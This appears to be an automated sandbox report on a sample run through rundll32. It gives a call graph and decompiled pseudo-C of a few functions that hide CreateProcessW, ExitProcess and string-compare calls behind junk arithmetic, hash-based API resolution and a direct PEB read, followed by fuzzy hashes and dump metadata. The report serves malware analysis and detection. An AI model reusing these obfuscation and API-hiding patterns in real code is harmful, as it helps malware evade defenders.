5158->5162 5160 30eceb9 GetPEB 5160->5162 5161 30d53d4 5163 30e3d6e GetPEB 5161->5163 5162->5158 5162->5160 5162->5161 5164 30d53d2 5162->5164 5165 30f0352 GetPEB 5162->5165 5170 30e0490 5162->5170 5163->5164 5164->4294 5165->5162 5167 30eeb5c 5166->5167 5168 30d2309 GetPEB 5167->5168 5169 30eec0d 5168->5169 5169->4283 5171 30e04a9 5170->5171 5172 30d2309 GetPEB 5171->5172 5173 30e055b 5172->5173 5173->5162 5178 30d3c91 5179 30e3fae GetPEB 5178->5179 5180 30d3ed7 5179->5180 5181 30e17cb 2 API calls 5180->5181 5182 30d3eeb 5181->5182 5183 30d3f5c GetPEB 5182->5183 5190 30d3f4e 5182->5190 5184 30d3f06 5183->5184 5185 30dab99 GetPEB 5184->5185 5186 30d3f27 5185->5186 5187 30f0352 GetPEB 5186->5187 5188 30d3f36 5187->5188 5189 30ef790 GetPEB 5188->5189 5189->5190 3915 30e43b3 3916 30e4473 3915->3916 3917 30e449e 3915->3917 3921 30d441e 3916->3921 3926 30d48e6 3921->3926 3923 30d4ac5 3945 30ecaa8 3923->3945 3926->3923 3927 30d4ac3 3926->3927 3931 30d3f5c GetPEB 3926->3931 3932 30f0352 GetPEB 3926->3932 3937 30e17cb 3926->3937 3941 30d3035 3926->3941 3955 30ed617 3926->3955 3959 30dab99 3926->3959 3963 30f1988 3926->3963 3966 30d5a31 3926->3966 3927->3917 3934 30d4248 3927->3934 3931->3926 3932->3926 3935 30d2309 GetPEB 3934->3935 3936 30d42ec ExitProcess 3935->3936 3936->3917 3938 30e17e1 3937->3938 3970 30d2309 3938->3970 3942 30d3054 3941->3942 3943 30d2309 GetPEB 3942->3943 3944 30d30e3 3943->3944 3944->3926 3946 30ecacf 3945->3946 3947 30d5a31 GetPEB 3946->3947 3948 30ecc5c 3947->3948 4000 30f31d2 3948->4000 3950 30ecc95 3951 30ecca0 3950->3951 4004 30ea566 3950->4004 3951->3927 3954 30ea566 GetPEB 3954->3951 3956 30ed631 3955->3956 4008 30f07fc 3956->4008 3960 30dabbd 3959->3960 4012 30f2e95 3960->4012 3964 30d2309 GetPEB 3963->3964 3965 30f1a33 3964->3965 3965->3926 3967 30d5a4b 3966->3967 4015 30e7c86 3967->4015 3971 30d23fb lstrcmpiW 3970->3971 3972 30d23d4 3970->3972 3971->3926 3976 30ebec9 3972->3976 3974 30d23e6 3979 30ea607 3974->3979 3983 30ede10 GetPEB 
3976->3983 3978 30ebfaa 3978->3974 3981 30ea62c 3979->3981 3980 30ea6e6 3980->3971 3981->3980 3984 30eb1b5 3981->3984 3983->3978 3985 30eb31e 3984->3985 3992 30de902 3985->3992 3988 30eb360 3990 30ea607 GetPEB 3988->3990 3991 30eb38e 3988->3991 3990->3991 3991->3980 3993 30de915 3992->3993 3994 30d2309 GetPEB 3993->3994 3995 30de9bb 3994->3995 3995->3988 3996 30e9d10 3995->3996 3997 30e9d20 3996->3997 3998 30d2309 GetPEB 3997->3998 3999 30e9d95 3998->3999 3999->3988 4001 30f3205 4000->4001 4002 30d2309 GetPEB 4001->4002 4003 30f32a6 CreateProcessW 4002->4003 4003->3950 4005 30ea576 4004->4005 4006 30d2309 GetPEB 4005->4006 4007 30ea5fb 4006->4007 4007->3954 4009 30f0824 4008->4009 4010 30d2309 GetPEB 4009->4010 4011 30ed69c 4010->4011 4011->3926 4013 30d2309 GetPEB 4012->4013 4014 30dabd7 4013->4014 4014->3926 4016 30e7ca1 4015->4016 4019 30f2f5c 4016->4019 4020 30f2f7b 4019->4020 4021 30d2309 GetPEB 4020->4021 4022 30d5aa9 4021->4022 4022->3926 5191 30efd10 5192 30efe4b 5191->5192 5193 30efe91 5192->5193 5194 30d5923 GetPEB 5192->5194 5195 30efe65 5194->5195 5199 30ebd84 5195->5199 5198 30f0352 GetPEB 5198->5193 5200 30ebd9f 5199->5200 5202 30ebe97 5200->5202 5203 30f2869 5200->5203 5202->5198 5204 30f2882 5203->5204 5205 30d2309 GetPEB 5204->5205 5206 30f291c 5205->5206 5206->5200

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 63 30f31d2-30f32c2 call 30f2523 call 30d2309 CreateProcessW
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E030F31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t54;
                                                                                                        				int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				WCHAR* _t71;
                                                                                                        
                                                                                                        				_push(_a56);
                                                                                                        				_t71 = __edx;
                                                                                                        				_push(_a52);
                                                                                                        				_push(_a48);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(0);
                                                                                                        				_push(__edx);
                                                                                                        				E030F2523(_t54);
                                                                                                        				_v28 = 0x2cec17;
                                                                                                        				_v24 = 0;
                                                                                                        				_v16 = 0x5aadab;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 >> 0xc;
                                                                                                        				_v16 = _v16 ^ 0x000031a8;
                                                                                                        				_v12 = 0x82119f;
                                                                                                        				_v12 = _v12 >> 2;
                                                                                                        				_v12 = _v12 + 0xffff09c3;
                                                                                                        				_t65 = 0x25;
                                                                                                        				_v12 = _v12 / _t65;
                                                                                                        				_v12 = _v12 ^ 0x0004d7f2;
                                                                                                        				_v8 = 0x7cd8a6;
                                                                                                        				_v8 = _v8 >> 6;
                                                                                                        				_v8 = _v8 | 0x702a8e48;
                                                                                                        				_v8 = _v8 + 0xffff37f0;
                                                                                                        				_v8 = _v8 ^ 0x702d019b;
                                                                                                        				_v20 = 0x367fb2;
                                                                                                        				_v20 = _v20 + 0xffff7ba2;
                                                                                                        				_v20 = _v20 ^ 0x003ae9c9;
                                                                                                        				E030D2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
                                                                                                        				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
                                                                                                        				return _t63;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 030F32BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction ID: 9ad26d36205ff988089de5e8b2818ea934cb45120a6e2252eed9666faf645644
                                                                                                        • Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction Fuzzy Hash: 9D311676801248BBCF65DF96CD09CDFBFB9FB89704F108188F91466220D3B58A60DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 30d4248-30d42f6 call 30d2309 ExitProcess
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E030D4248() {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _t52;
                                                                                                        				signed int _t53;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0xac8d12;
                                                                                                        				_v28 = 0x59a528;
                                                                                                        				_v12 = 0xae5295;
                                                                                                        				_v12 = _v12 << 2;
                                                                                                        				_t52 = 0xb;
                                                                                                        				_v12 = _v12 / _t52;
                                                                                                        				_v12 = _v12 ^ 0x0038a8c1;
                                                                                                        				_v20 = 0xfd2184;
                                                                                                        				_v20 = _v20 ^ 0xb7361747;
                                                                                                        				_v20 = _v20 ^ 0xb7cc531f;
                                                                                                        				_v8 = 0xac9b8;
                                                                                                        				_t53 = 9;
                                                                                                        				_v8 = _v8 / _t53;
                                                                                                        				_v8 = _v8 << 0xd;
                                                                                                        				_v8 = _v8 >> 0xd;
                                                                                                        				_v8 = _v8 ^ 0x00077309;
                                                                                                        				_v16 = 0x4164cf;
                                                                                                        				_v16 = _v16 << 2;
                                                                                                        				_v16 = _v16 ^ 0x010bebe7;
                                                                                                        				E030D2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
                                                                                                        				ExitProcess(0);
                                                                                                        			}













                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 030D42F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction ID: e09f38618d4ec9f13407c809335d65ed4d468883bbdc2e28ff73d96de5e2d424
                                                                                                        • Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction Fuzzy Hash: 4A1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 71 30e17cb-30e1893 call 30f2523 call 30d2309 lstrcmpiW
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E030E17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t44;
                                                                                                        				int _t55;
                                                                                                        				signed int _t57;
                                                                                                        				WCHAR* _t62;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_t62 = __ecx;
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E030F2523(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0x2c5dd9;
                                                                                                        				_v28 = 0x29a411;
                                                                                                        				_v16 = 0xb6013c;
                                                                                                        				_v16 = _v16 >> 2;
                                                                                                        				_v16 = _v16 << 5;
                                                                                                        				_v16 = _v16 ^ 0x05bceb0d;
                                                                                                        				_v12 = 0xa7496a;
                                                                                                        				_t57 = 7;
                                                                                                        				_v12 = _v12 * 0x55;
                                                                                                        				_v12 = _v12 | 0x1a205192;
                                                                                                        				_v12 = _v12 ^ 0x3fab9f8f;
                                                                                                        				_v8 = 0xf5055a;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 + 0xa16;
                                                                                                        				_v8 = _v8 * 0x7e;
                                                                                                        				_v8 = _v8 ^ 0x1132ba81;
                                                                                                        				_v20 = 0xaea409;
                                                                                                        				_v20 = _v20 << 6;
                                                                                                        				_v20 = _v20 ^ 0x2ba3ef66;
                                                                                                        				E030D2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
                                                                                                        				_t55 = lstrcmpiW(_t62, _a8); // executed
                                                                                                        				return _t55;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 030E188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: 0add233f5c4e04601ebbf229e043b490ac87ec221c3f4bebe1173735269c68f7
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: BA2124B5D0120CFFDB08DFA4C94A9EEBBB4EB44304F208189E425B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E030EDE10() {
                                                                                                        
                                                                                                        				return  *[fs:0x30];
                                                                                                        			}



                                                                                                        0x030ede16

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Offset: 030D0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.710416535.00000000030D0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710455705.00000000030F5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.710460115.00000000030F7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_30d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.6%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:1075
                                                                                                        Total number of Limit Nodes:6

                                                                                                        Graph


                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 63 42f31d2-42f32c2 call 42f2523 call 42d2309 CreateProcessW
                                                                                                        C-Code - Quality: 53%
                                                                                                        			E042F31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t54;
                                                                                                        				int _t63;
                                                                                                        				signed int _t65;
                                                                                                        				WCHAR* _t71;
                                                                                                        
                                                                                                        				_push(_a56);
                                                                                                        				_t71 = __edx;
                                                                                                        				_push(_a52);
                                                                                                        				_push(_a48);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(0);
                                                                                                        				_push(__edx);
                                                                                                        				E042F2523(_t54);
                                                                                                        				_v28 = 0x2cec17;
                                                                                                        				_v24 = 0;
                                                                                                        				_v16 = 0x5aadab;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 >> 0xc;
                                                                                                        				_v16 = _v16 ^ 0x000031a8;
                                                                                                        				_v12 = 0x82119f;
                                                                                                        				_v12 = _v12 >> 2;
                                                                                                        				_v12 = _v12 + 0xffff09c3;
                                                                                                        				_t65 = 0x25;
                                                                                                        				_v12 = _v12 / _t65;
                                                                                                        				_v12 = _v12 ^ 0x0004d7f2;
                                                                                                        				_v8 = 0x7cd8a6;
                                                                                                        				_v8 = _v8 >> 6;
                                                                                                        				_v8 = _v8 | 0x702a8e48;
                                                                                                        				_v8 = _v8 + 0xffff37f0;
                                                                                                        				_v8 = _v8 ^ 0x702d019b;
                                                                                                        				_v20 = 0x367fb2;
                                                                                                        				_v20 = _v20 + 0xffff7ba2;
                                                                                                        				_v20 = _v20 ^ 0x003ae9c9;
                                                                                                        				E042D2309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
                                                                                                        				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
                                                                                                        				return _t63;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 042F32BB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction ID: 27af09bca012bde542314b50bd955fe83969fa901e29a17397abfb17b186d2b5
                                                                                                        • Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
                                                                                                        • Instruction Fuzzy Hash: 06311672901248BBCF65DF96CD09CDFBFB5FB89704F108188F91462220D3B58A60DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 42d4248-42d42f6 call 42d2309 ExitProcess
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E042D4248() {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _t52;
                                                                                                        				signed int _t53;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0xac8d12;
                                                                                                        				_v28 = 0x59a528;
                                                                                                        				_v12 = 0xae5295;
                                                                                                        				_v12 = _v12 << 2;
                                                                                                        				_t52 = 0xb;
                                                                                                        				_v12 = _v12 / _t52;
                                                                                                        				_v12 = _v12 ^ 0x0038a8c1;
                                                                                                        				_v20 = 0xfd2184;
                                                                                                        				_v20 = _v20 ^ 0xb7361747;
                                                                                                        				_v20 = _v20 ^ 0xb7cc531f;
                                                                                                        				_v8 = 0xac9b8;
                                                                                                        				_t53 = 9;
                                                                                                        				_v8 = _v8 / _t53;
                                                                                                        				_v8 = _v8 << 0xd;
                                                                                                        				_v8 = _v8 >> 0xd;
                                                                                                        				_v8 = _v8 ^ 0x00077309;
                                                                                                        				_v16 = 0x4164cf;
                                                                                                        				_v16 = _v16 << 2;
                                                                                                        				_v16 = _v16 ^ 0x010bebe7;
                                                                                                        				E042D2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
                                                                                                        				ExitProcess(0);
                                                                                                        			}













                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 042D42F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction ID: f3dcbc7de2dd5b5a1305b06243d406fd89a2ccd52328f6de302e569e23a07b24
                                                                                                        • Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
                                                                                                        • Instruction Fuzzy Hash: 9D1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 71 42e17cb-42e1893 call 42f2523 call 42d2309 lstrcmpiW
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E042E17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t44;
                                                                                                        				int _t55;
                                                                                                        				signed int _t57;
                                                                                                        				WCHAR* _t62;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_t62 = __ecx;
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E042F2523(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0x2c5dd9;
                                                                                                        				_v28 = 0x29a411;
                                                                                                        				_v16 = 0xb6013c;
                                                                                                        				_v16 = _v16 >> 2;
                                                                                                        				_v16 = _v16 << 5;
                                                                                                        				_v16 = _v16 ^ 0x05bceb0d;
                                                                                                        				_v12 = 0xa7496a;
                                                                                                        				_t57 = 7;
                                                                                                        				_v12 = _v12 * 0x55;
                                                                                                        				_v12 = _v12 | 0x1a205192;
                                                                                                        				_v12 = _v12 ^ 0x3fab9f8f;
                                                                                                        				_v8 = 0xf5055a;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 + 0xa16;
                                                                                                        				_v8 = _v8 * 0x7e;
                                                                                                        				_v8 = _v8 ^ 0x1132ba81;
                                                                                                        				_v20 = 0xaea409;
                                                                                                        				_v20 = _v20 << 6;
                                                                                                        				_v20 = _v20 ^ 0x2ba3ef66;
                                                                                                        				E042D2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
                                                                                                        				_t55 = lstrcmpiW(_t62, _a8); // executed
                                                                                                        				return _t55;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 042E188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Offset: 042D0000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.715062652.00000000042D0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715130518.00000000042F5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000006.00000002.715162308.00000000042F7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_42d0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: df64d5247886e04b468d1ee3420de8b3b65ca9bcc695641b30c5cc21e3f34145
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: 5B2124B5D1020CFFDB08DFA4C94A9EEBBB4EB44304F208199E425B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:29.8%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0.6%
                                                                                                        Total number of Nodes:1092
                                                                                                        Total number of Limit Nodes:33

                                                                                                        Graph

